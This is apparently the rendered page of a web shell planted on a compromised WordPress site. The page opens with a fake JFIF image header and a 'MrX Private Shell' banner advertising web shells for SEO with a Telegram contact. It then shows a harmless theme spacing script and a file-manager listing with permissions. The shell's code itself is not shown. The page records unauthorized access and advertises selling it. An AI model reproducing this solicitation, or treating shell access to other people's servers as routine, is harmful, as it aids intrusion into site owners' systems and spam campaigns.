����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
( function( $, api ) {
// No longer needed as of 1.2.95
// Keeping it here just in case
api.controlConstructor['spacing'] = api.Control.extend( {
ready: function() {
var control = this;
$( '.pmthemes-number-control', control.container ).on( 'change keyup',
function() {
control.setting.set( $( this ).val() );
}
);
}
} );
api.controlConstructor['pmniches-spacing-slider'] = api.Control.extend( {
ready: function() {
var control = this;
$( '.slider-input', control.container ).on( 'change keyup',
function() {
control.setting.set( $( this ).val() );
}
);
}
} );
api.controlConstructor['pmthemes-spacing'] = api.Control.extend( {
ready: function() {
var control = this;
control.container.on( 'change keyup', '.spacing-top',
function() {
control.settings['top'].set( jQuery( this ).val() );
}
);
control.container.on( 'change keyup', '.spacing-right',
function() {
control.settings['right'].set( jQuery( this ).val() );
}
);
control.container.on( 'change keyup', '.spacing-bottom',
function() {
control.settings['bottom'].set( jQuery( this ).val() );
}
);
control.container.on( 'change keyup', '.spacing-left',
function() {
control.settings['left'].set( jQuery( this ).val() );
}
);
}
} );
} )( jQuery, wp.customize );
jQuery( document ).ready( function($) {
$( '.pmniches-link-spacing' ).on( 'click', function(e) {
e.preventDefault();
// Set up variables
var _this = $( this ),
element = _this.data( 'element' );
// Add our linked-values class to the next 4 elements
_this.parent( '.pmniches-spacing-section' ).prevAll().slice(0,4).find( 'input' ).addClass( 'linked-values' ).attr( 'data-element', element );
// Change our link icon class
_this.hide();
_this.next( 'span' ).show();
});
$( '.pmniches-unlink-spacing' ).on( 'click', function(e) {
e.preventDefault();
// Set up variables
var _this = $( this );
// Remove our linked-values class to the next 4 elements
_this.parent( '.pmniches-spacing-section' ).prevAll().slice(0,4).find( 'input' ).removeClass( 'linked-values' ).attr( 'data-element', '' );
// Change our link icon class
_this.hide();
_this.prev( 'span' ).show();
});
$( '.pmniches-spacing-section' ).on( 'input', '.linked-values', function() {
var data = $( this ).attr( 'data-element' );
var val = $( this ).val();
$( '.linked-values[ data-element="' + data + '" ]' ).each( function( key, value ) {
var element = $( this );
element.val( val ).change();
});
});
});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .htaccess | File | 0 B | 0644 |
|
| custom-font-control.js | File | 8.2 KB | 0644 |
|
| customizer-preview.js | File | 51.84 KB | 0644 |
|
| ranger.js | File | 2.88 KB | 0644 |
|
| spacing.js | File | 2.53 KB | 0644 |
|
| toggle.js | File | 3.41 KB | 0644 |
|